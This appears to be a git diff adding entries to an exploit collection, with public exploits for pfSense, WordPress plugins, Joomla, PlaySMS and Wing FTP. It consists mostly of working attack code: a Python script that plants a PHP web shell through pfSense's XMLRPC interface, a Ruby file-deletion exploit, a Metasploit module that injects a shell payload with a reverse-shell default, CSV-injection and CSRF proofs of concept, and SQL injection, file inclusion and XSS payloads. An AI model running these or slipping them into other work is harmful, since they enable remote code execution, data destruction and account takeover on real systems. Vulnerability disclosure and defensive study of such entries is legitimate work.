//The reseller_accounts table has been used to store department information since PDQit
$Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id";
$R = $db->query($Q);
return $R;
}
c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami)
V. RECOMMENDATIONS
a) Restrict access to administrative (and other) folder when non authenticated.
b) Prepare SQL query before execution using PDO to escape injections.
c) Check file type on file upload forms to prevent PHP code upload instead of templates.
VI. TIMELINE
July 23th, 2019: Vulnerability identification
July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement
August 13th, 2019: Contact to vendor to ask for fix - no reply
September 04th, 2019: Vendor was informed 24h before public disclosure
September 05th, 2019: public disclosure after 45 days
VIII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.
The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy

167
exploits/php/webapps/47413.py Executable file
View file

@ -0,0 +1,167 @@
# Exploit Title: Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection
# Date: 23/09/2018
# Author: Nassim Asrir
# Vendor Homepage: https://www.pfsense.org/
# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
# CVE: CVE-2019-16701
# Tested On: Windows 10(64bit) | Pfsense 2.3.4 / 2.4.4-p3
######################################################################################################
1 : About Pfsense:
==================
pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.
2 : Technical Analysis:
=======================
The pfsense allow users (uid=0) to make remote procedure calls over HTTP (XMLRPC) and the XMLRPC contain some critical methods which allow any authenticated user/hacker to execute OS commands.
XMLRPC methods:
pfsense.exec_shell
pfsense.exec_php
pfsense.filter_configure
pfsense.interfaces_carp_configure
pfsense.backup_config_section
pfsense.restore_config_section
pfsense.merge_config_section
pfsense.merge_installedpackages_section_xmlrpc
pfsense.host_firmware_version
pfsense.reboot
pfsense.get_notices
system.listMethods
system.methodHelp
system.methodSignature
As we see in the output we have two interesting methods: pfsense.exec_shell and pfsense.exec_php.
2 : Static Analysis:
====================
In the static analysis we will analysis the xmlrpc.php file.
Line (73 - 82)
This code check if the user have enough privileges.
$user_entry = getUserEntry($username);
/*
* admin (uid = 0) is allowed
* or regular user with necessary privilege
*/
if (isset($user_entry['uid']) && $user_entry['uid'] != '0' &&
!userHasPrivilege($user_entry, 'system-xmlrpc-ha-sync')) {
log_auth("webConfigurator authentication error for '" .
$username . "' from " . $this->remote_addr .
" not enough privileges");
Line (137 - 146)
This part of code is the interest for us.
As we can see, first we have a check for auth then we have the dangerous function (eval) which take as parametere ($code).
public function exec_php($code) {
$this->auth();
eval($code);
if ($toreturn) {
return $toreturn;
}
return true;
}
Line (155 - 160)
In this part of code also we have a check for auth then the execution for ($code)
public function exec_shell($code) {
$this->auth();
mwexec($code);
return true;
}
3 - Exploit:
============
#!/usr/bin/env python
import argparse
import requests
import urllib2
import time
import sys
import string
import random
parser = argparse.ArgumentParser()
parser.add_argument("--rhost", help = "Target Uri https://127.0.0.1")
parser.add_argument("--password", help = "pfsense Password")
args = parser.parse_args()
rhost = args.rhost
password = args.password
print ""
print "[+] CVE-2019-16701 - Pfsense - Remote Code Injection"
print ""
print "[+] Author: Nassim Asrir"
print ""
command = "<?xml version='1.0' encoding='iso-8859-1'?>"
command += "<methodCall>"
command += "<methodName>pfsense.host_firmware_version</methodName>"
command += "<params>"
command += "<param><value><string>"+password+"</string></value></param>"
command += "</params>"
command += "</methodCall>"
stage1 = rhost + "/xmlrpc.php"
page = urllib2.urlopen(stage1, data=command).read()
print "[+] Checking Login Creds"
if "Authentication failed" in page:
print "[-] Wrong password :("
sys.exit(0)
else:
random = ''.join([random.choice(string.ascii_letters + string.digits) for n in xrange(32)])
print "[+] logged in successfully :)"
print "[+] Generating random file "+random+".php"
print "[+] Sending the exploit ....."
command = "<?xml version='1.0' encoding='iso-8859-1'?>"
command += "<methodCall>"
command += "<methodName>pfsense.exec_php</methodName>"
command += "<params>"
command += "<param><value><string>"+password+"</string></value></param>"
command += "<param><value><string>exec('echo \\'<pre> <?php $res = system($_GET[\"cmd\"]); echo $res ?> </pre>\\' > /usr/local/www/"+random+".php');</string></value></param>"
command += "</params>"
command += "</methodCall>"
stage1 = rhost + "/xmlrpc.php"
page = urllib2.urlopen(stage1, data=command).read()
final = rhost+"/"+str(random)+".php"
check = urllib2.urlopen(final)
print "[+] Checking ....."
if check.getcode() == 200:
print "[+] Yeah! You got your shell: " + final+"?cmd=id"
else:
print "[+] Sorry :( Shell not found check the path"

238
exploits/php/webapps/47443.rb Executable file
View file

@ -0,0 +1,238 @@
#!/usr/bin/env ruby
# Exploit Title: WordPress Arforms - 3.7.1
# CVE ID: CVE-2019-16902
# Date: 2019-09-27
# Exploit Author: Ahmad Almorabea
# Author Website: http://almorabea.net
# Updated version of the exploit can be found always at : http://almorabea.net/cve-2019-16902.txt
# Software Link: https://www.arformsplugin.com/documentation/changelog/
# Version: 3.7.1
#**************Start Notes**************
# You can run the script by putting the script name and then the URL and the URL should have directory the Wordpress folders.
# Example : exploit.rb www.test.com, and the site should have the Wordpress folders in it such www.test.com/wp-contnet.
# Pay attention to the 3 numbers at the beginning maybe you need to change it in other types like in this script is 143.
# But maybe in other forms maybe it's different so you have to change it accordingly.
# This version of the software is applicable to path traversal attack so you can delete files if you knew the path such ../../ and so on
# There is a request file with this Script make sure to put it in the same folder.
#**************End Notes****************
require "net/http"
require 'colorize'
$host = ARGV[0] || ""
$session_id = ARGV[1] || "3c0e9a7edfa6682cb891f1c3df8a33ad"
def start_function ()
puts "It's a weird question to ask but let's start friendly I'm Arforms exploit, what's your name?".yellow
name = STDIN.gets
if $host == ""
puts "What are you doing #{name} where is the URL so we can launch the attack, please pay more attention buddy".red
exit
end
check_existence_arform_folder
execute_deletion_attack
puts "Done ... see ya " + name
end
def send_checks(files_names)
j = 1
while j <= files_names.length-1
uri = URI.parse("http://#{$host}/wp-content/uploads/arforms/userfiles/"+files_names[j])
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
request["Connection"] = "keep-alive"
request["Accept-Language"] = "en-US,en;q=0.5"
request["Accept-Encoding"] = "gzip, deflate"
request["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
begin
response = http.request(request).code
puts "The File " + files_names[j] + " has the response code of " + response
rescue Exception => e
puts "[!] Failed!"
puts e
end
j = j+1
end
end
def check_existence_arform_folder ()
path_array = ["/wp-plugins/arforms","/wp-content/uploads/arforms/userfiles"]
$i = 0
results = []
while $i <= path_array.length-1
uri = URI.parse("http://#{$host}/#{path_array[$i]}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https' # Enable HTTPS support if it's HTTPS
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
results[$i] = response.code
#puts"response code is : " + response.code
$i +=1
end
puts "****************************************************"
if results[0] == "200" || results[0] =="301"
puts "The Plugin is Available on the following path : ".green + $host + path_array[0]
else
puts "We couldn't locate the Plugin in this path, you either change the path or we can't perform the attack, Simple Huh?".red
exit
end
if (results[1] == "200" || results[1] == "301")
puts "The User Files folder is Available on the following path : ".green + $host + path_array[1]
else
puts "We couldn't find the User Files folder, on the following path ".red + $host + path_array[1]
end
puts "****************************************************"
end
def execute_deletion_attack ()
puts "How many file you want to delete my man"
amount = STDIN.gets.chomp.to_i
if(amount == 0)
puts "You can't use 0 or other strings this input for the amount of file you want to delete so it's an Integer".blue
exit
end
file_names = []
file_names[0] = "143_772_1569713145702_temp3.txt"
j = 1
while j <= amount.to_i
puts "Name of the file number " + j.to_s
file_names[j] = STDIN.gets
file_names[j].strip!
j = j+1
end
uri = URI.parse("http://#{$host}")
#puts uri
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Get.new(uri.request_uri)
response = http.request(request)
global_cookie = response.response['set-cookie'] + "; PHPSESSID="+$session_id #Assign the session cookie
$i = 0
while $i <= file_names.length-1
puts "Starting the Attack Journey .. ".green
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Content-Type' => 'multipart/form-data; boundary=---------------------------14195989911851978808724573615',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => global_cookie,
'X_FILENAME' => file_names[$i],
'X-FILENAME' => file_names[$i],
'Connection' => 'close'
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path, headers)
request.body = File.read("post_file")
response = http.request request
$i = $i +1
end
execute_delete_request file_names,global_cookie,amount.to_i
puts "Finished.........."
end
def execute_delete_request (file_names,cookies,rounds )
$i = 0
while $i <= file_names.length-1
puts "Starting the Attack on file No #{$i.to_s} ".green
uri = URI.parse("http://#{$host}/wp-admin/admin-ajax.php")
headers =
{
'Referer' => 'From The Sky',
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'X-Requested-With'=> 'XMLHttpRequest',
'Cookie' => cookies,
'Content-Type' => 'application/x-www-form-urlencoded; charset=UTF-8',
'Accept-Encoding' => 'gzip, deflate',
'Connection' => 'close'
}
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = true if uri.scheme == 'https'
request = Net::HTTP::Post.new(uri.path,headers)
request.body = "action=arf_delete_file&file_name="+file_names[$i]+"&form_id=143"
response = http.request(request)
if $i != 0
puts "File Name requested to delete is : " + file_names[$i] + " has the Response Code of " + response.code
end
$i = $i +1
end
send_checks file_names
end
start_function()

28
exploits/php/webapps/48023.txt Normal file
View file

@ -0,0 +1,28 @@
# Exploit Title: VehicleWorkshop 1.0 - 'bookingid' SQL Injection
# Data: 2020-02-06
# Exploit Author: Mehran Feizi
# Vendor HomagePage: https://github.com/spiritson/VehicleWorkshop
# Tested on: Windows
# Google Dork: N/A
=========
Vulnerable Page:
=========
/viewtestdrive.php
==========
Vulnerable Source:
==========
Line6: if(isset($_GET['testid']))
Line8: $results = mysql_query("DELETE from testdrive where bookingid ='$_GET[testid]'");
Line11: if(isset($_GET['testbid']))
Line13: $results = mysql_query("UPDATE testdrive SET status='Approved' where bookingid ='$_GET[testbid]'");
Line16: if(isset($_GET['testbida']))
Line:18: $results = mysql_query("UPDATE testdrive SET status='Rejected' where bookingid ='$_GET[testbida]'");
=========
POC:
=========
http://site.com/viewtestdrive.php?bookingid=[SQL]

39
exploits/php/webapps/48058.txt Normal file
View file

@ -0,0 +1,39 @@
# Tile: Wordpress Plugin tutor.1.5.3 - Local File Inclusion
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================
contact me:
telegram: @MF0584
gmail: mehranfeizi13841384@gmail.com
===================================================================
Vulnerable page:
/instructors.php
===================================================================
Vulnerable Source:
3: $sub_page = tutor_utils ()->avalue_dot('sub_page', $_GET);
5: $include_file = tutor ()->path . "views/pages/{$sub_page}.php";
7: include include $include_file;
requires:
4: if(!empty($sub_page))
6: if(file_exists($include_file))
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=[LFI]
=================================================================================

18
exploits/php/webapps/48059.txt Normal file
View file

@ -0,0 +1,18 @@
# Tile: Wordpress Plugin tutor.1.5.3 - Persistent Cross-Site Scripting
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/tutor/
===================================================================
Vulnerable page:
/Quiz.php
===================================================================
Vulnerable Source:
473: echo echo $topic_id;
447: $topic_id = sanitize_text_field($_POST['topic_id']);
===================================================================
Exploit:
localhost/wp-content/plugins/tutor/classes/Quiz.php
$_POST('topic_id') = <script>alert('mehran')</script>
=================================================================================

14
exploits/php/webapps/48061.txt Normal file
View file

@ -0,0 +1,14 @@
# Tile: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-12
# vendor home page: https://wordpress.org/plugins/wordfence/
==============================================================================
Vulnerable Source:
5662: readfile readfile($localFile);
5645: $localFile = ABSPATH . preg_replace('/^(?:\.\.|[\/]+)/', '', sanitize_text_field($_GET['file']));
=================================================================================
Exploit:
localhost/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=[LFD]
=================================================================================

39
exploits/php/webapps/48062.txt Normal file
View file

@ -0,0 +1,39 @@
# Tile: Wordpress Plugin contact-form-7 5.1.6 - Remote File Upload
# Author: mehran feizi
# Category: webapps
# Date: 2020-02-11
# vendor home page: https://wordpress.org/plugins/contact-form-7/
Vulnerable Source:
134: move_uploaded_file move_uploaded_file($file['tmp_name'], $new_file))
82: $file = $_FILES[$name] : null;
132: $new_file = path_join($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
131: $filename = wp_unique_filename($uploads_dir, $filename);
122: $uploads_dir = wpcf7_maybe_add_random_dir($uploads_dir);
121: $uploads_dir = wpcf7_upload_tmp_dir();
128: $filename = apply_filters('wpcf7_upload_file_name', $filename, $file['name'], $tag);
126: $filename = wpcf7_antiscript_file_name ($filename);
125: $filename = wpcf7_canonicalize ($filename, 'as-is');
124: $filename = $file['name'];
82: $file = $_FILES[$name] : null;
82: $file = $_FILES[$name] : null;
78: ⇓ function wpcf7_file_validation_filter($result, $tag)
Exploit:
<?php
$shahab="file.jpg";
$ch = curl_init("http://localhost/wordpress/wp-content/plugins/contact-form-7/modules/file.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('zip'=>"@$shahab"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
?>
Location File:
http://localhost/wordpress/wp-content/plugins/contact-form-7/file.jpg

19
exploits/php/webapps/48065.txt Normal file
View file

@ -0,0 +1,19 @@
# Title : WordPress Plugin ultimate-member 2.1.3 - Local File Inclusion
# Author : mehran feizi
# Vendor : https://wordpress.org/plugins/ultimate-member/
# Category : Webapps
# Date : 2020-02-11
# Vendor home page: https://wordpress.org/plugins/ultimate-member/
Vulnerable Page:
/class-admin-upgrade.php
Vulnerable Source:
354: if(empty($_POST['pack'])) else
356: include_once include_once $this->packages_dir . DIRECTORY_SEPARATOR . $_POST['pack'] . DIRECTORY_SEPARATOR . 'init.php';
Exploit:
localhost/wp-content/plugins/worprees plugin bug dar/ultimate-member/includes/admin/core/class-admin-upgrade.php
$_POST('pack')=<script>alert('xss')</script>

29
exploits/php/webapps/48088.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Wordpress Plugin WOOF Products Filter for WooCommerce 1.2.3 - Persistent Cross-Site Scripting
# Date: 2020-02-15
# Exploit Author: Shahab.ra.9
# Vendor Homepage: https://products-filter.com/
# Software Link: https://wordpress.org/plugins/woocommerce-products-filter/
# Version: 1.2.3
# Tested on: windows 10
# WOOF - Products Filter for WooCommerce
Exploit:
http://target/wp-admin/admin.php?page=wc-settings&tab=woof
now in tab "design" -> then enter (xss code) in the (textfields) front side
->(Text for block toggle ,Text for block toggle , Custom front css styles
file link).
then click on button "save changes".
then refresh page ,now you see the execution of xss code ,then refersh
frontend page site -> "http://target/shop/ " or frontend pages used this
plugin the execution of xss code.
Demo Poc:
http://target/wp-admin/admin.php?page=wc-settings&tab=woof
now in tab "design" -> then enter ( ";</script><img src=1
onerror="alert(`xss store bug -> shahab.ra.9`);"><script>var1="1 ) in the
(textfields) front side ->(Text for block toggle ,Text for block toggle and
Custom front css styles file link).
then click on button "save changes".

31
exploits/php/webapps/48093.txt Normal file
View file

@ -0,0 +1,31 @@
# Exploit Title: WordPress Plugin WP Sitemap Page 1.6.2 - Persistent Cross-Site Scripting
# Dork:N/A
# Date: 2020-02-17
# Exploit Author: UltraSecurityTeam
# Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalife , Milad Ranjbar
# Vendor Homepage: UltraSec.Org
# Software Link: https://downloads.wordpress.org/plugin/wp-sitemap-page.zip
# Tested on: Windows/Linux
# Version: 1.6.2
.:: Plugin Description ::.
An easy way to add a sitemap on one of your pages becomes reality thanks to this WordPress plugin. Just use the shortcode [wp_sitemap_page] on any of your pages. This will automatically generate a sitemap of all your pages and posts
.:: Proof Of Concept (PoC) ::.
Step 1 - Open WordPress Setting
Step 2 - Open Wp Sitemap Page
Step 3 - Inject Your Java Script Codes to Exclude pages
Step 4 - Click Button Save Changes
Step 5 - Run Your Payload
.:: Tested Payload ::.
'>"><script>alert(/XSS By UltraSecurity/)</script>
.:: Post Request ::.
option_page=wp-sitemap-page&action=update&_wpnonce=de5e7c2417&_wp_http_referer=%2Fwp%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp_sitemap_page%26settings-updated%3Dtrue&wsp_posts_by_category=&wsp_exclude_pages=%27%3E%22%3E%3Cscript%3Ealert%28%2FXSS+By+UltraSecurity%2F%29%3C%2Fscript%3E&wsp_exclude_cpt_archive=1&wsp_exclude_cpt_author=1&submit=Save+Changes

43
exploits/php/webapps/48198.txt Normal file
View file

@ -0,0 +1,43 @@
#!/usr/bin/python3
# Exploit Title: Joomla 3.9.0 < 3.9.7 - CSV Injection
# Date: 2020-03-10
# Vulnerability Authors: Jose Antonio Rodriguez Garcia and Phil Keeble (MWR InfoSecurity)
# Exploit Author: Abdullah - @i4bdullah
# Vendor Homepage: https://www.joomla.org/
# Software Link: https://downloads.joomla.org/cms/joomla3/3-9-5/Joomla_3-9-5-Stable-Full_Package.zip?format=zip
# Version: 3.9.0 < 3.9.7
# Tested on: Ubuntu 18.04 LTS and Windows 7
# CVE : CVE-2019-12765
import mechanize
import sys
if (len(sys.argv) != 2):
print(f'Usage: {sys.argv[0]} <Base URL>')
print(f'Example: {sys.argv[0]} http://127.0.0.1 ')
sys.exit(1)
base_url = sys.argv[1]
reg_url = f"{base_url}/joomla/index.php/component/users/?view=registration&Itemid=101"
login_url = f"{base_url}/joomla/index.php?option=com_users"
def pwn(username='abdullah'):
payload = "=cmd|'/c calc.exe'!A1"
print(f"Registering a new user with the name <{payload}>...")
reg_form = mechanize.Browser()
reg_form.set_handle_robots(False)
reg_form.open(reg_url)
reg_form.select_form(nr=0)
reg_form.form['jform[name]'] = payload
reg_form.form['jform[username]'] = username
reg_form.form['jform[password1]'] = 'password'
reg_form.form['jform[password2]'] = 'password'
reg_form.form['jform[email1]'] = 'whatever@i4bdullah.com'
reg_form.form['jform[email2]'] = 'whatever@i4bdullah.com'
reg_form.submit()
print("The exploit ran successfully.")
print("Exiting...")
sys.exit(0)
pwn()

189
exploits/php/webapps/48199.txt Normal file
View file

@ -0,0 +1,189 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code
Execution',
'Description' => %q{
This module exploits a Preauth Server-Side Template Injection
leads remote code execution vulnerability in PlaySMS Before Version 1.4.3.
This issue is caused by Double processes a server-side template
by Custom PHP Template system called 'TPL'.
which is used in PlaySMS template engine location
src/Playsms/Tpl.php:_compile(). When Attacker supply username with a
malicious payload
and submit. This malicious payload first process by TPL and
save the value in the current template after this value goes for the second
process
which result in code execution.
The TPL(https://github.com/antonraharja/tpl) template language
is vulnerable to PHP code injection.
This module was tested against PlaySMS 1.4 on HackTheBox's
Forlic Machine.
},
'Author' =>
[
'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Metasploit
Module
'Lucas Rosevear' # Found and Initial PoC by NCC Groupd
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE','2020-8644'],
['URL','
https://research.nccgroup.com/2020/02/11/technical-advisory-playsms-pre-authentication-remote-code-execution-cve-2020-8644/
']
],
'DefaultOptions' =>
{
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_python'
},
'Privileged' => false,
'Platform' => %w[unix linux],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'python'
}
},
'Targets' =>
[
[ 'PlaySMS Before 1.4.3', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 05 2020'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base playsms directory path",
'/']),
])
end
def uri
return target_uri.path
end
def check
begin
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, 'index.php')
})
rescue
vprint_error('Unable to access the index.php file')
return CheckCode::Unknown
end
if res.code == 302 &&
res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
return Exploit::CheckCode::Appears
end
return CheckCode::Safe
end
#Send Payload in Login Request
def login
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
# Grabbing CSRF token from body
/name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine
CSRF token") if csrf.nil?
vprint_good("X-CSRF-Token for login : #{csrf}")
cookies = res.get_cookies
vprint_status('Trying to Send Payload in Username Field ......')
#Encoded in base64 to avoid HTML TAGS which is filter by Application.
evil = "{{`printf #{Rex::Text.encode_base64(payload.encode)}|base64
-d |sh`}}"
# Send Payload with cookies.
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
'cookie' => cookies,
'vars_get' => Hash[{
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
'op' => 'login',
}.to_a.shuffle],
'vars_post' => Hash[{
'X-CSRF-Token' => csrf,
'username' => evil,
'password' => ''
}.to_a.shuffle],
})
fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to
Login request") if res.nil?
# Request Status Check
if res.code == 302
print_good("Payload successfully Sent")
return cookies
else
fail_with(Failure::UnexpectedReply, "#{peer} - Something Goes
Wrong")
end
end
def exploit
cookies = login
vprint_status("Cookies here : #{cookies}")
# Execute Last Sent Username.
res = send_request_cgi({
'uri' => normalize_uri(uri, 'index.php'),
'method' => 'GET',
'cookie' => cookies,
'vars_get' => {
'app' => 'main',
'inc' => 'core_auth',
'route' => 'login',
}
})
end
end
--
Touhid Shaikh
Exploit Researcher and Developer | Security Consultant
m: +91 7738794435
e: touhidshaikh22@gmail.com
www.touhidshaikh.com [image: Facebook icon]
<https://www.facebook.com/tauheeds1> [image: LinkedIn icon]
<https://www.linkedin.com/in/touhidshaikh22/> [image: Twitter icon]
<https://twitter.com/touhidshaikh22> [image: Youtube icon]
<https://www.youtube.com/touhidshaikh22>
The content of this email is confidential and intended for the recipient
specified in message only. It is strictly forbidden to share any part of
this message with any third party, without a written consent of the sender.
If you received this message by mistake, please reply to this message and
follow with its deletion, so that we can ensure such a mistake does not
occur in the future.

319
exploits/php/webapps/48200.txt Normal file
View file

@ -0,0 +1,319 @@
# Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation
# Date: 2020-03-10
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://www.wftpserver.com
# Version: v6.2.6
# Tested on: Windows 10
*Summary:*
An authenticated CSRF exists in web client and web administration of Wing
FTP v6.2.6, a crafted HTML page could delete admin user from the
application where as administration needs to re-install the program and add
admin user again. Issue was patched in v6.2.7.
*Proof of concept:*
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://IP:5466/admin_delete_admin.html" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="r" value="0&#46;9219583354400562" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
*Patch (lua/cgiadmin.lua):*
URL: https://www.wftpserver.com/serverhistory.htm
local outfunc = "echo"
local function out (s, i, f)
s = string.sub(s, i, f or -1)
if s == "" then return s end
s = string.gsub(s, "([\\\n\'])", "\\%1")
s = string.gsub(s, "\r", "\\r")
return string.format(" %s('%s'); ", outfunc, s)
end
local function translate (s)
s = string.gsub(s, "<%%(.-)%%>", "<??lua %1 ??>")
local res = {}
local start = 1
while true do
local ip, fp, target, exp, code = string.find(s, "<%?%?(%w*)[
\t]*(=?)(.-)%?%?>", start)
if not ip then break end
table.insert(res, out(s, start, ip-1))
if target ~= "" and target ~= "lua" then
table.insert(res, out(s, ip, fp))
else
if exp == "=" then
table.insert(res, string.format(" %s(%s);", outfunc, code))
else
table.insert(res, string.format(" %s ", code))
end
end
start = fp + 1
end
table.insert(res, out(s, start))
return table.concat(res)
end
local function compile (src, chunkname)
return loadstring(translate(src),chunkname)
end
function include (filename, env)
if incfiles[filename] == nil then
incfiles[filename] = true;
path = c_GetAppPath()
path = path .. "/webadmin/"..filename
local errstr = string.format("<b>The page '%s' does not
exist!</b>",filename)
local fh,_ = io.open (path)
if not fh then
echo_out = echo_out..errstr
return
end
local src = fh:read("*a")
fh:close()
local prog = compile(src, path)
local _env
if env then
_env = getfenv (prog)
setfenv (prog, env)
end
local status,err = pcall(prog)
if not status then
if type(err) == "string" and not string.find(err,"exit function!") then
print(string.format("some error in %s!",err))
end
return
end
end
end
function var_dump(var)
print("{")
if type(var) == "string" or type(var) == "number" or type(var) == "boolean"
or type(var) == "function" then
print(var)
elseif(type(var) == "thread") then
print("thread")
elseif(type(var) == "userdata") then
print("userdata")
elseif type(var) == "nil" then
print("nil")
elseif type(var) == "table" then
for k,v in pairs(var) do
if type(k) == "string" then k="'"..k.."'" end
if(type(v) == "string") then
print(k.."=>'"..v.."',")
elseif(type(v) == "number" or type(v) == "boolean") then
print(k.."=>"..tostring(v)..",")
elseif(type(v) == "function") then
print(k.."=>function,")
elseif(type(v) == "thread") then
print(k.."=>thread,")
elseif(type(v) == "userdata") then
print(k.."=>userdata,")
elseif(type(v) == "nil") then
print(k.."=>nil,")
elseif(type(v) == "table") then
print(k.."=>table,")
else
print(k.."=>object,")
end
end
else
print("object")
end
print("}")
end
function init_get()
local MatchedReferer = true
if _SESSION_ID ~= nil then
local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
if Referer ~= nil and Referer ~= "" then
local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
if Host ~= nil and Host ~= "" then
if string.sub(Referer,8,string.len(Host)+7) == Host or
string.sub(Referer,9,string.len(Host)+8) == Host then
MatchedReferer = true
else
MatchedReferer = false
exit()
end
end
else
MatchedReferer = false
end
end
string.gsub (urlparam, "([^&=]+)=([^&=]*)&?",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_GET,key,val)
else
rawset(_GET,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_GET,unescape(key),unescape(val))
else
--rawset(_GET,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
end
function init_post()
local MatchedReferer = true
if _SESSION_ID ~= nil then
local Referer = string.match(strHead,"[rR]eferer:%s?%s([^\r\n]*)")
if Referer ~= nil and Referer ~= "" then
local Host = string.match(strHead,"[hH]ost:%s?%s([^\r\n]*)")
if Host ~= nil and Host ~= "" then
if string.sub(Referer,8,string.len(Host)+7) == Host or
string.sub(Referer,9,string.len(Host)+8) == Host then
MatchedReferer = true
else
MatchedReferer = false
exit()
end
end
else
MatchedReferer = false
end
end
if
string.find(strHead,"[cC]ontent%-[tT]ype:%s?multipart/form%-data;%s?boundary=")
then
string.gsub (strContent,
"[cC]ontent%-[dD]isposition:%s?form%-data;%s?name=\"([^\"\r\n]*)\"\r\n\r\n([^\r\n]*)\r\n",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_POST,key,val)
else
rawset(_POST,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_POST,unescape(key),unescape(val))
else
--rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
else
string.gsub (strContent, "([^&=\r\n]+)=([^&=\r\n]*)&?",
function (key, val)
if key == "domain" then
if MatchedReferer == true then
rawset(_POST,key,val)
else
rawset(_POST,key,specialhtml_encode(val))
end
else
if MatchedReferer == true then
rawset(_POST,unescape(key),unescape(val))
else
--rawset(_POST,unescape(key),specialhtml_encode(unescape(val)))
end
end
end
)
end
end
function init_session()
if _COOKIE["UIDADMIN"] ~= nil then
_SESSION_ID = _COOKIE["UIDADMIN"]
SessionModule.load(_SESSION_ID)
end
end
function init_cookie()
